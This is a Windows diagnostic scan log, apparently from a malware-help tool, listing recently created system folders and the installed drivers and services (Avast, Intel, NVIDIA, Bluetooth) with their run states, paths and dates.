2019-08-27 19:27:04 ----D---- C:\WINDOWS\system32\sk-SK
2019-08-27 19:27:04 ----D---- C:\WINDOWS\system32\migwiz
2019-08-27 19:27:04 ----D---- C:\WINDOWS\system32\drivers\en-US
2019-08-27 19:27:04 ----D---- C:\WINDOWS\system32\Dism
2019-08-27 19:27:04 ----D---- C:\WINDOWS\system32\appraiser
2019-08-27 19:27:04 ----D---- C:\WINDOWS\ShellExperiences
2019-08-27 19:27:04 ----D---- C:\WINDOWS\Provisioning
2019-08-27 19:27:04 ----D---- C:\WINDOWS\PolicyDefinitions
2019-08-27 19:27:04 ----D---- C:\WINDOWS\apppatch
2019-08-27 19:27:04 ----D---- C:\Program Files\Windows Photo Viewer
2019-08-27 19:27:04 ----D---- C:\Program Files\Windows Media Player
2019-08-27 19:27:04 ----D---- C:\Program Files\internet explorer
2019-08-27 19:27:04 ----D---- C:\Program Files (x86)\Windows Photo Viewer
2019-08-27 19:27:04 ----D---- C:\Program Files (x86)\Windows Media Player
2019-08-27 19:27:04 ----D---- C:\Program Files (x86)\Internet Explorer
2019-08-27 19:21:29 ----SD---- C:\WINDOWS\SYSWOW64\F12
2019-08-27 19:21:29 ----D---- C:\WINDOWS\SYSWOW64\WCN
2019-08-27 19:21:28 ----SD---- C:\WINDOWS\system32\F12
2019-08-27 19:21:28 ----D---- C:\WINDOWS\SYSWOW64\drivers\en-US
2019-08-27 19:21:28 ----D---- C:\WINDOWS\system32\WCN
2019-08-27 19:21:28 ----D---- C:\WINDOWS\system32\SystemResetPlatform
2019-08-27 19:21:27 ----D---- C:\WINDOWS\system32\en
2019-08-27 19:21:27 ----D---- C:\WINDOWS\en-US
2019-08-27 19:21:27 ----D---- C:\Program Files (x86)\Windows Defender
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\zh-TW
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\tr-TR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\sv-SE
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\sr-Latn-RS
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\sl-SI
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\ru-RU
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\ro-RO
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\pt-PT
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\pt-BR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\pl-PL
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\nl-NL
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\nb-NO
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\lv-LV
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\lt-LT
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\ko-KR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\ja-JP
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\it-IT
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\hu-HU
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\hr-HR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\he-IL
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\fr-FR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\fr-CA
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\fi-FI
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\et-EE
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\es-MX
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\es-ES
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\en-GB
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\el-GR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\de-DE
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\da-DK
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\cs-CZ
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\bg-BG
2019-08-27 19:19:26 ----D---- C:\WINDOWS\SYSWOW64\ar-SA
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\zh-TW
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\tr-TR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\sv-SE
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\sr-Latn-RS
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\sl-SI
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\ru-RU
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\ro-RO
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\pt-PT
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\pt-BR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\pl-PL
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\nl-NL
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\nb-NO
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\lv-LV
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\lt-LT
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\ko-KR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\ja-jp
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\it-IT
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\hu-HU
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\hr-HR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\he-IL
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\fr-FR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\fr-CA
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\fi-FI
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\et-EE
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\es-MX
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\es-ES
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\en-GB
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\el-GR
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\de-DE
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\da-DK
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\cs-CZ
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\bg-BG
2019-08-27 19:19:26 ----D---- C:\WINDOWS\system32\ar-SA

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R0 aswbidsh;aswbidsh; C:\WINDOWS\system32\drivers\aswbidsh.sys [2019-07-16 206056]
R0 aswbuniv;aswbuniv; C:\WINDOWS\system32\drivers\aswbuniv.sys [2019-07-16 61688]
R0 aswElam;aswElam; C:\WINDOWS\system32\drivers\aswElam.sys [2019-01-07 15488]
R0 aswRvrt;aswRvrt; C:\WINDOWS\system32\drivers\aswRvrt.sys [2019-07-16 88160]
R0 aswVmm;aswVmm; C:\WINDOWS\system32\drivers\aswVmm.sys [2019-08-05 387688]
R0 iaStorAC;@oem13.inf,%iaStorAC.DeviceDesc%;Intel(R) Chipset SATA/PCIe RST Premium Controller; C:\WINDOWS\System32\drivers\iaStorAC.sys [2018-02-21 941624]
R0 iorate;@%SystemRoot%\system32\drivers\iorate.sys,-101; C:\WINDOWS\system32\drivers\iorate.sys [2019-08-27 55608]
R1 afunix;afunix; C:\WINDOWS\system32\drivers\afunix.sys [2018-09-15 40960]
R1 aswArPot;aswArPot; C:\WINDOWS\system32\drivers\aswArPot.sys [2019-07-16 209256]
R1 aswbidsdriver;aswbidsdriver; C:\WINDOWS\system32\drivers\aswbidsdriver.sys [2019-07-16 263224]
R1 aswKbd;aswKbd; C:\WINDOWS\system32\drivers\aswKbd.sys [2019-07-16 42504]
R1 aswNetSec;aswNetSec; C:\WINDOWS\system32\drivers\aswNetSec.sys [2019-07-16 549416]
R1 aswRdr;aswRdr; C:\WINDOWS\system32\drivers\aswRdr2.sys [2019-07-16 112520]
R1 aswSnx;aswSnx; C:\WINDOWS\system32\drivers\aswSnx.sys [2019-07-31 1030784]
R1 aswSP;aswSP; C:\WINDOWS\system32\drivers\aswSP.sys [2019-07-16 477288]
R1 bam;@%SystemRoot%\system32\drivers\bam.sys,-100; C:\WINDOWS\system32\drivers\bam.sys [2018-09-15 63288]
R1 FileCrypt;@%systemroot%\system32\drivers\filecrypt.sys,-100; C:\WINDOWS\system32\drivers\filecrypt.sys [2018-09-15 60416]
R1 GpuEnergyDrv;@%SystemRoot%\system32\drivers\gpuenergydrv.sys,-100; C:\WINDOWS\System32\drivers\gpuenergydrv.sys [2018-09-15 8704]
R1 HWiNFO32;HWiNFO32/64 Kernel Driver; \??\C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [2018-11-03 27552]
R2 aswMonFlt;aswMonFlt; C:\WINDOWS\system32\drivers\aswMonFlt.sys [2019-07-31 168896]
R2 aswStm;aswStm; C:\WINDOWS\system32\drivers\aswStm.sys [2019-07-16 225816]
R2 CldFlt;Windows Cloud Files Filter Driver; C:\WINDOWS\system32\drivers\cldflt.sys [2019-08-27 452096]
R2 iocbios2;iocbios2; \??\C:\Program Files (x86)\Intel\Intel(R) Extreme Tuning Utility\Drivers\IocDriver\64bit\iocbios2.sys [2017-09-01 38424]
R2 MMCSS;@%systemroot%\system32\drivers\mmcss.sys,-100; C:\WINDOWS\system32\drivers\mmcss.sys [2019-08-27 51712]
R3 AcerAirplaneModeController;@oem41.inf,%ServiceDesc%;Acer Airplane Mode Controller; C:\WINDOWS\System32\drivers\AcerAirplaneModeController.sys [2019-05-17 29912]
R3 BTHUSB;@bth.inf,%BTHUSB.SvcDesc%;Bluetooth Radio USB Driver; C:\WINDOWS\System32\drivers\BTHUSB.sys [2019-08-27 92672]
R3 CAD;@ChargeArbitration.inf,%CAD_DevDesc%;Charge Arbitration Driver; C:\WINDOWS\System32\drivers\CAD.sys [2018-09-15 63288]
R3 DFX12;@oem31.inf,%DFX_Device.SvcDesc%;DFX Audio Enhancer; C:\WINDOWS\system32\drivers\dfx12x64.sys [2018-03-08 39048]
R3 e2xw10x64;@oem44.inf,%RIVET.Service.DispName%;NDIS Miniport Driver for Killer PCI-E Gigabit Ethernet Controller; C:\WINDOWS\System32\drivers\e2xw10x64.sys [2017-10-30 165608]
R3 iaLPSS2i_I2C_CNL;@iaLPSS2i_I2C_CNL.inf,%iaLPSS2i_I2C_CNL.SVCDESC%;Intel(R) Serial IO I2C Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_CNL.sys [2018-09-15 180736]
R3 ibtusb;@oem20.inf,%ibtusb.SVCDESC_IBT%;Intel(R) Wireless Bluetooth(R); C:\WINDOWS\system32\DRIVERS\ibtusb.sys [2017-12-07 136128]
R3 IntcAzAudAddService;Service for Realtek HD Audio (WDM); C:\WINDOWS\system32\drivers\RTKVHD64.sys [2018-07-13 6316992]
R3 MEIx64;@oem26.inf,%TEE_SvcDesc%;Intel(R) Management Engine Interface ; C:\WINDOWS\System32\drivers\TeeDriverW8x64.sys [2018-05-06 228992]
R3 Netwtw06;___ Intel(R) Wireless Adapter Driver for Windows 10 - 64 Bit; C:\WINDOWS\System32\drivers\Netwtw06.sys [2018-09-15 8723968]
R3 nvlddmkm;nvlddmkm; C:\WINDOWS\System32\DriverStore\FileRepository\nvaci.inf_amd64_2f1946ae97d3f755\nvlddmkm.sys [2019-03-02 20736208]
R3 nvvad_WaveExtensible;@oem55.inf,%nvvad_WaveExtensible.SvcDesc%;NVIDIA Virtual Audio Device (Wave Extensible) (WDM); C:\WINDOWS\system32\drivers\nvvad64v.sys [2018-10-01 70024]
R3 nvvhci;@oem37.inf,%ServiceDesc%;NVVHCI Enumerator Service; C:\WINDOWS\System32\drivers\nvvhci.sys [2019-03-01 66792]
R3 RfeCoSvc;@oem2.inf,%RivetCoServiceName%;RfeCoSvc; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\RfeCo10X64.sys [2018-04-26 150152]
S0 bttflt;@virtdisk.inf,%service_desc%;Microsoft Hyper-V VHDPMEM BTT Filter; C:\WINDOWS\System32\drivers\bttflt.sys [2018-09-15 42504]
S0 cht4iscsi;cht4iscsi; C:\WINDOWS\System32\drivers\cht4sx64.sys [2018-09-15 319488]
S0 iaStorAVC;@iastorav.inf,%iaStorAVC.DeviceDesc%;Intel Chipset SATA RAID Controller; C:\WINDOWS\System32\drivers\iaStorAVC.sys [2018-09-15 885048]
S0 ItSas35i;ItSas35i; C:\WINDOWS\System32\drivers\ItSas35i.sys [2018-09-15 148480]
S0 LSI_SAS2i;LSI_SAS2i; C:\WINDOWS\System32\drivers\lsi_sas2i.sys [2018-09-15 124416]
S0 LSI_SAS3i;LSI_SAS3i; C:\WINDOWS\System32\drivers\lsi_sas3i.sys [2018-09-15 128512]
S0 megasas2i;megasas2i; C:\WINDOWS\System32\drivers\MegaSas2i.sys [2018-09-15 75264]
S0 megasas35i;megasas35i; C:\WINDOWS\System32\drivers\megasas35i.sys [2018-09-15 79872]
S0 nvpciflt;nvpciflt; C:\WINDOWS\System32\DriverStore\FileRepository\nvaci.inf_amd64_2f1946ae97d3f755\nvpciflt.sys [2019-03-02 57224]
S0 percsas2i;percsas2i; C:\WINDOWS\System32\drivers\percsas2i.sys [2018-09-15 58880]
S0 percsas3i;percsas3i; C:\WINDOWS\System32\drivers\percsas3i.sys [2018-09-15 68608]
S0 Ramdisk;Windows RAM Disk Driver; C:\WINDOWS\system32\DRIVERS\ramdisk.sys [2018-09-15 41784]
S0 scmbus;@scmbus.inf,%scmbus.SvcDesc%;Microsoft Storage Class Memory Bus Driver; C:\WINDOWS\System32\drivers\scmbus.sys [2019-08-27 134968]
S3 AcpiDev;@acpidev.inf,%AcpiDev.SvcDesc%;ACPI Devices driver; C:\WINDOWS\System32\drivers\AcpiDev.sys [2018-09-15 19968]
S3 applockerfltr;@%systemroot%\system32\srpapi.dll,-102; C:\WINDOWS\system32\drivers\applockerfltr.sys [2018-09-15 18432]
S3 bindflt;@%systemroot%\system32\drivers\bindflt.sys,-100; C:\WINDOWS\system32\drivers\bindflt.sys [2019-08-27 104248]
S3 BthEnum;@bth.inf,%BthEnum.SVCDESC%;Bluetooth Enumerator Service; C:\WINDOWS\System32\drivers\BthEnum.sys [2019-08-27 111104]
S3 BthLEEnum;@BthLEEnum.inf,%BthLEEnum.SVCDESC%;Bluetooth Low Energy Driver; C:\WINDOWS\System32\drivers\Microsoft.Bluetooth.Legacy.LEEnumerator.sys [2019-08-27 91136]
S3 BthMini;@bth.inf,%BTHMINI.SvcDesc%;Bluetooth Radio Driver; C:\WINDOWS\System32\drivers\BTHMINI.sys [2018-09-15 34816]
S3 BthPan;@bthpan.inf,%BthPan.DisplayName%;Bluetooth Device (Personal Area Network); C:\WINDOWS\System32\drivers\bthpan.sys [2018-09-15 133120]
S3 BTHPORT;@bth.inf,%BTHPORT.SvcDesc%;Bluetooth Port Driver; C:\WINDOWS\System32\drivers\BTHport.sys [2019-08-27 1232384]
S3 buttonconverter;@buttonconverter.inf,%btnconv.SvcDesc%;Service for Portable Device Control devices; C:\WINDOWS\System32\drivers\buttonconverter.sys [2018-09-15 40960]
S3 CapImg;@capimg.inf,%CapImgHid_Service%;HID driver for CapImg touch screen; C:\WINDOWS\System32\drivers\capimg.sys [2018-09-15 125952]
S3 DFX11_1;DFX Audio Enhancer 11.1; C:\WINDOWS\system32\drivers\dfx11_1x64.sys [2018-03-08 28008]
S3 genericusbfn;@genericusbfn.inf,%genericusbfn.ServiceName%;Generic USB Function Class; C:\WINDOWS\System32\drivers\genericusbfn.sys [2018-09-15 20992]
S3 hidinterrupt;@hidinterrupt.inf,%HID_Interrupt.SvcDesc%;Common Driver for HID Buttons implemented with interrupts; C:\WINDOWS\System32\drivers\hidinterrupt.sys [2018-09-15 51512]
S3 hidspi;@hidspi_km.inf,%hidspi.SVCDESC%;Microsoft SPI HID Miniport Driver; C:\WINDOWS\System32\drivers\hidspi.sys [2018-09-15 60928]
S3 hvservice;@%SystemRoot%\system32\drivers\hvservice.sys,-16; C:\WINDOWS\system32\drivers\hvservice.sys [2019-08-27 80400]
S3 HwNClx0101;Microsoft Hardware Notifications Class Extension Driver; C:\WINDOWS\System32\Drivers\mshwnclx.sys [2018-09-15 27648]
S3 cht4vbd;@cht4vx64.inf,%cht4vbd.generic%;Chelsio Virtual Bus Driver; C:\WINDOWS\System32\drivers\cht4vx64.sys [2018-09-15 1866768]
S3 iagpio;@iagpio.inf,%iagpio.SVCDESC%;Intel Serial IO GPIO Controller Driver; C:\WINDOWS\System32\drivers\iagpio.sys [2018-09-15 36352]
S3 iai2c;@iai2c.inf,%iai2c.SVCDESC%;Intel(R) Serial IO I2C Host Controller; C:\WINDOWS\System32\drivers\iai2c.sys [2018-09-15 91136]
S3 iaLPSS2_GPIO2;Intel(R) Serial IO GPIO Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2_GPIO2.sys [2018-01-19 123544]
S3 iaLPSS2_SPI;Intel(R) Serial IO SPI Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2_SPI.sys [2018-01-19 160408]
S3 iaLPSS2_UART2;Intel(R) Serial IO UART Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2_UART2.sys [2018-01-19 315544]
S3 iaLPSS2i_GPIO2;@iaLPSS2i_GPIO2_SKL.inf,%iaLPSS2i_GPIO2.SVCDESC%;Intel(R) Serial IO GPIO Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2.sys [2018-09-15 79360]
S3 iaLPSS2i_GPIO2_BXT_P;@iaLPSS2i_GPIO2_BXT_P.inf,%iaLPSS2i_GPIO2_BXT_P.SVCDESC%;Intel(R) Serial IO GPIO Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_BXT_P.sys [2018-09-15 93184]
S3 iaLPSS2i_GPIO2_CNL;@iaLPSS2i_GPIO2_CNL.inf,%iaLPSS2i_GPIO2_CNL.SVCDESC%;Intel(R) Serial IO GPIO Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_CNL.sys [2018-09-15 112128]
S3 iaLPSS2i_GPIO2_GLK;@iaLPSS2i_GPIO2_GLK.inf,%iaLPSS2i_GPIO2_GLK.SVCDESC%;Intel(R) Serial IO GPIO Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_GPIO2_GLK.sys [2018-09-15 96256]
S3 iaLPSS2i_I2C;@iaLPSS2i_I2C_SKL.inf,%iaLPSS2i_I2C.SVCDESC%;Intel(R) Serial IO I2C Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_I2C.sys [2018-09-15 171520]
S3 iaLPSS2i_I2C_BXT_P;@iaLPSS2i_I2C_BXT_P.inf,%iaLPSS2i_I2C_BXT_P.SVCDESC%;Intel(R) Serial IO I2C Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_BXT_P.sys [2018-09-15 175104]
S3 iaLPSS2i_I2C_GLK;@iaLPSS2i_I2C_GLK.inf,%iaLPSS2i_I2C_GLK.SVCDESC%;Intel(R) Serial IO I2C Driver v2; C:\WINDOWS\System32\drivers\iaLPSS2i_I2C_GLK.sys [2018-09-15 177664]
S3 iaStorAfs;@oem13.inf,%iaStorAfs.DisplayName%;iaStorAfs; C:\WINDOWS\System32\drivers\iaStorAfs.sys [2018-02-21 72248]
S3 ibbus;@mlx4_bus.inf,%Ibbus.ServiceDesc%;Mellanox InfiniBand Bus/AL (Filter Driver); C:\WINDOWS\System32\drivers\ibbus.sys [2018-09-15 566800]
S3 IndirectKmd;@%SystemRoot%\system32\drivers\IndirectKmd.sys,-100; C:\WINDOWS\System32\drivers\IndirectKmd.sys [2018-09-15 45568]
S3 IPT;IPT; C:\WINDOWS\System32\drivers\ipt.sys [2018-09-15 42496]
S3 irda;IrDA; C:\WINDOWS\system32\drivers\irda.sys [2018-09-15 124928]
S3 mausbhost;@mausbhost.inf,%MAUSBHost.ServiceName%;MA-USB Host Controller Driver; C:\WINDOWS\System32\drivers\mausbhost.sys [2018-09-15 515384]
S3 mausbip;@mausbhost.inf,%MAUSBIP.ServiceName%;MA-USB IP Filter Driver; C:\WINDOWS\System32\drivers\mausbip.sys [2018-09-15 58680]
S3 MbbCx;MBB Network Adapter Class Extension; C:\WINDOWS\system32\drivers\MbbCx.sys [2019-08-27 290304]
S3 Microsoft_Bluetooth_AvrcpTransport;@microsoft_bluetooth_avrcptransport.inf,%Microsoft_Bluetooth_AvrcpTransport.ServiceDescription%;Microsoft Bluetooth Avrcp Transport Driver; C:\WINDOWS\System32\drivers\Microsoft.Bluetooth.AvrcpTransport.sys [2018-09-15 53760]
S3 mlx4_bus;@mlx4_bus.inf,%MLX4BUS.ServiceDesc%;Mellanox ConnectX Bus Enumerator; C:\WINDOWS\System32\drivers\mlx4_bus.sys [2018-09-15 1150496]
S3 ndfltr;@mlx4_bus.inf,%ndfltr.ServiceDesc%;NetworkDirect Service; C:\WINDOWS\System32\drivers\ndfltr.sys [2018-09-15 153616]
S3 NetAdapterCx;Network Adapter Wdf Class Extension Library; C:\WINDOWS\system32\drivers\NetAdapterCx.sys [2018-09-15 184320]
S3 nhi;Thunderbolt(TM) Controller; C:\WINDOWS\System32\drivers\tbt100x.sys [2018-02-21 137768]
S3 nvdimm;@nvdimm.inf,%nvdimm.SvcDesc%;Microsoft NVDIMM device driver; C:\WINDOWS\System32\drivers\nvdimm.sys [2018-09-15 148480]
S3 NvStreamKms;NVIDIA KMS; \??\C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [2019-01-16 30336]
S3 PktMon;Packet Monitor Driver; C:\WINDOWS\system32\drivers\PktMon.sys [2018-09-15 85504]
S3 pmem;@pmem.inf,%pmem.SvcDesc%;Microsoft persistent memory disk driver; C:\WINDOWS\System32\drivers\pmem.sys [2019-08-27 117248]
S3 PNPMEM;@memory.inf,%PNPMEM.SvcDesc%;Microsoft Memory Module Driver; C:\WINDOWS\System32\drivers\pnpmem.sys [2018-09-15 17408]
S3 ReFSv1;ReFSv1; C:\WINDOWS\system32\drivers\ReFSv1.sys [2019-08-27 981816]
S3 RFCOMM;@tdibth.inf,%RFCOMM.DisplayName%;Bluetooth Device (RFCOMM Protocol TDI); C:\WINDOWS\System32\drivers\rfcomm.sys [2018-09-15 202240]
S3 rhproxy;@rhproxy.inf,%rhproxy.SVCDESC%;Resource Hub proxy driver; C:\WINDOWS\System32\drivers\rhproxy.sys [2018-09-15 108032]
S3 SDFRd;@SDFRd.inf,%SDFRd.ServiceDesc%;SDF Reflector; C:\WINDOWS\System32\drivers\SDFRd.sys [2018-09-15 33080]
S4 hvcrash;hvcrash; C:\WINDOWS\System32\drivers\hvcrash.sys [2018-09-15 33280]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 AESMService;Intel® SGX AESM; C:\WINDOWS\System32\DriverStore\FileRepository\sgx_psw.inf_amd64_1781f8bae8fdf5c0\aesm_service.exe [2018-02-27 3226664]
R2 avast! Antivirus;Avast Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [2019-07-16 414976]
R2 avast! Firewall;Avast Firewall Service; C:\Program Files\AVAST Software\Avast\afwServ.exe [2019-07-16 423288]
R2 CDPSvc;@%SystemRoot%\system32\cdpsvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R2 CDPUserSvc_47a12;Connected Devices Platform User Service_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R2 CoreMessagingRegistrar;@%SystemRoot%\system32\coremessaging.dll,-1; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R2 DiagTrack;@%SystemRoot%\system32\diagtrack.dll,-3001; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
R2 DoSvc;@%systemroot%\system32\dosvc.dll,-100; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
R2 DusmSvc;@%SystemRoot%\System32\dusmsvc.dll,-1; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
R2 IAStorDataMgrSvc;Intel(R) Rapid Storage Technology; C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe [2018-01-30 17992]
R2 ibtsiva;@oem20.inf,%SERVICE_NAME%;Intel Bluetooth Service; C:\WINDOWS\system32\ibtsiva []
R2 jhi_service;Intel(R) Dynamic Application Loader Host Interface Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [2018-02-01 214672]
R2 Killer Network Service;Killer Network Service; C:\WINDOWS\System32\drivers\RivetNetworks\Killer\KillerNetworkService.exe [2018-04-26 2319320]
R2 LMS;Intel(R) Management and Security Application Local Management Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe [2018-02-01 622736]
R2 NvContainerLocalSystem;NVIDIA LocalSystem Container; C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2019-01-30 790920]
R2 NVDisplay.ContainerLocalSystem;NVIDIA Display Container LS; C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe [2019-03-01 767288]
R2 NvTelemetryContainer;NVIDIA Telemetry Container; C:\Program Files\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe [2019-03-02 791136]
R2 OneSyncSvc_47a12;Sync Host_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R2 osrss;@%systemroot%\system32\osrss.dll,-500; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R2 RtkAudioUniversalService;Realtek Audio Universal Service; C:\WINDOWS\System32\RtkAudUService64.exe [2018-02-28 652736]
R3 aswbIDSAgent;aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [2019-07-16 6797008]
R3 BcastDVRUserService_47a12;GameDVR and Broadcast User Service_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R3 BthAvctpSvc;@%SystemRoot%\system32\BthAvctpSvc.dll,-101; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R3 camsvc;@%SystemRoot%\system32\CapabilityAccessManager.dll,-1; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R3 cbdhsvc_47a12;Používateľská služba schránky_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R3 ClipSVC;@%SystemRoot%\system32\ClipSVC.dll,-103; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
R3 DisplayEnhancementService;@%SystemRoot%\System32\Microsoft.Graphics.Display.DisplayEnhancementService.dll,-1000; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R3 LicenseManager;@%SystemRoot%\system32\licensemanagersvc.dll,-200; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
R3 PimIndexMaintenanceSvc_47a12;Kontaktné údaje_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
R3 SecurityHealthService;@%systemroot%\system32\SecurityHealthAgent.dll,-1002; C:\WINDOWS\system32\SecurityHealthService.exe [2019-08-27 864568]
R3 SEMgrSvc;@%SystemRoot%\System32\SEMgrSvc.dll,-1001; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S2 CDPUserSvc;@%SystemRoot%\system32\cdpusersvc.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S2 gupdate;Služba Google Update (gupdate); C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2018-12-12 153168]
S2 Intel(R) TPM Provisioning Service;Intel(R) TPM Provisioning Service; C:\Program Files\Intel\Intel(R) Management Engine Components\iCLS\TPMProvisioningService.exe [2017-11-17 720184]
S2 MapsBroker;@%SystemRoot%\System32\moshost.dll,-100; C:\WINDOWS\System32\svchost.exe [2018-09-15 51696]
S2 OneSyncSvc;@%SystemRoot%\system32\APHostRes.dll,-10002; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 AJRouter;@%SystemRoot%\system32\AJRouter.dll,-2; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 AvastWscReporter;AvastWscReporter; C:\Program Files\AVAST Software\Avast\wsc_proxy.exe [2019-07-16 57504]
S3 BcastDVRUserService;@%SystemRoot%\system32\BcastDVRUserService.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 BEService;BattlEye Service; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [2019-03-27 8577760]
S3 BluetoothUserService;@%SystemRoot%\system32\Microsoft.Bluetooth.UserService.dll,-101; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 BluetoothUserService_47a12;Služba podpory používateľov rozhrania Bluetooth_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 BTAGService;@%SystemRoot%\system32\BTAGService.dll,-101; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 CaptureService;@%SystemRoot%\system32\CaptureService.dll,-100; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
S3 CaptureService_47a12;CaptureService_47a12; C:\WINDOWS\system32\svchost.exe [2018-09-15 51696]
